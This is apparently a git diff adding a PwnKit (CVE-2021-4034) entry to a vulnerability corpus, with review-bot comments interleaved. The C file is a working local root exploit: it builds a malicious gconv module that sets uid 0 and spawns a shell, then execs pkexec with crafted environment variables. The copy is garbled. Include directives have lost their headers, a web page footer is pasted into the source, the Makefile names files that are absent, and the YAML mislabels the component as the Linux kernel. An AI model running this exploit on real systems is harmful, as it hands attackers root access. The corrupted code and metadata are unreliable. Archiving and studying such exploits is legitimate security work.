diff --git a/cve/linux-kernel/2021/CVE-2021-4034/.keep b/cve/linux-kernel/2021/CVE-2021-4034/.keep
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/Makefile b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..6037d3b5bd2176b3f8c2c17856d443c90f76d1bf
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
@@ -0,0 +1,14 @@
+CC = gcc
+
+EFLAGS = -Wall -Wextra -O2 -g -D_GNU_SOURCE
+SFLAGS = --shared -fPIC
+
+TARGET=exploit
+INCLUDE= include
+SOURCE= src
+
+all:
+ $(CC) $(SOURCE)/$(TARGET).c -o $(TARGET) $(EFLAGS) -I $(INCLUDE)
+ $(CC) $(SOURCE)/$(TARGET)-so.c -o $(TARGET).so $(EFLAGS) $(SFLAGS) -I $(INCLUDE)
+clean:
+ $(RM) -rf .sus $(TARGET)* GCONV_PATH=.
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..3ad5c25657454dd42f234b14ca72f0dccf25b6c4
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -0,0 +1,4 @@
+linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.
+
+ref:https://github.com/Anonymous-Family/CVE-2021-4034
+
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
new file mode 100644
index 0000000000000000000000000000000000000000..6a5112bbf463faaf5260a30ef0c8b13a0b5c4770
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
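Review bot: The `all` recipe in the new Makefile compiles `$(SOURCE)/$(TARGET).c` and `$(SOURCE)/$(TARGET)-so.c`, i.e. `src/exploit.c` and `src/exploit-so.c` with `-I include`, but this commit adds neither a `src/` nor an `include/` directory — the only C file it adds is `cve-2021-4034-poc.c` at the directory root, so `make` fails on the first rule. Either drop the Makefile or point it at the file that is actually present, e.g. `$(CC) cve-2021-4034-poc.c -o $(TARGET) $(EFLAGS)`. As rendered here the recipe lines appear to be indented with a space rather than the tab `make` requires, and `clean` removes a `.sus` path that nothing in this commit creates; both are worth checking against the raw file.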
@@ -0,0 +1,37 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include
+#include
+#include
+
+char *shell =
+ "#include \n"
+ "#include \n"
+ "#include \n\n"
+ "void gconv() {}\n"
+ "void gconv_init() {\n"
+ " setuid(0); setgid(0);\n"
+ " seteuid(0); setegid(0);\n"
+ " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+ " exit(0);\n"
+ "}";
+
+int main(int argc, char *argv[]) {
+ FILE *fp;
+ system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+ system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+ fp = fopen("pwnkit/pwnkit.c", "w");
+ fprintf(fp, "%s", shell);
+ fclose(fp);
+ system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+ char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+ execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}
+Footer
+© 2023 GitHub, Inc.
+Footer navigation
+Terms
+Privacy
+Security
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..0c23bdc66596442c1339c316aa8f0083650d6b1d
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
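Review bot: The last six added lines of `cve-2021-4034-poc.c` (`Footer`, `© 2023 GitHub, Inc.`, `Footer navigation`, `Terms`, `Privacy`, `Security`) are a GitHub page footer pasted in after `main`'s closing brace, and the three `#include` directives at the top of the file, as well as the three inside the `shell` string, have lost their header names — the file was evidently copied from a rendered web page rather than from the raw source, and it does not compile as committed. A CVE corpus entry should carry the upstream file verbatim and record where it came from; the README already names the origin repository, so add the specific commit or file hash it was taken from, e.g. a header comment `/* upstream PoC, unmodified; source: <origin repo URL>@<commit> */`, and replace the pasted copy with the raw file. That also makes later integrity checks of the artifact meaningful, which a hand-edited paste defeats.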
@@ -0,0 +1,17 @@
+id: CVE-2021-4034
+source: https://github.com/Anonymous-Family/CVE-2021-4034
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux Linux, A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
+ reference:
+ - https://www.anquanke.com/post/id/267774#h2-1
+ - https://nvd.nist.gov/vuln/detail/cve-2021-4034
+ - https://github.com/Anonymous-Family/CVE-2021-4034/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-4034
+ cwe-id: CWE-125
+ tags: cve2021,权限提升
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index caeacc6e702250a29a293233beb931db01606d04..23533074b5d4b9674a0be299948c88d9e1bbd9ce 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -31,6 +31,7 @@ cve:
 Influx-DB:
 - CVE-2019-20933
 linux-kernel:
+ - CVE-2021-4034
 - CVE-2021-4204
 - CVE-2021-22555
 - CVE-2021-4154
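Review bot: The `name` field describes the Linux kernel (`Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。`) while the `description`, the CVE itself and the file's own `source` link all concern polkit's `pkexec`, a userspace setuid utility — the entry mislabels the affected component, which matters when this list is used to decide which package to patch or which advisories to track. Change it to name the real component, e.g. `name: polkit pkexec 本地权限提升漏洞 (PwnKit)` or `name: Polkit pkexec local privilege escalation (PwnKit)`. The description also opens with a stray `Linux Linux, ` prefix that should be dropped, and the `description: |` block and the keys under `info:` appear flush-left in this rendering, so confirm the raw file keeps the two-space indentation YAML needs for `severity`, `reference` and `classification` to stay nested. The `openkylin_list.yaml` hunk below files the same CVE under `linux-kernel`, so the component label there (and the `cve/linux-kernel/` directory placement) carries the same mislabelling.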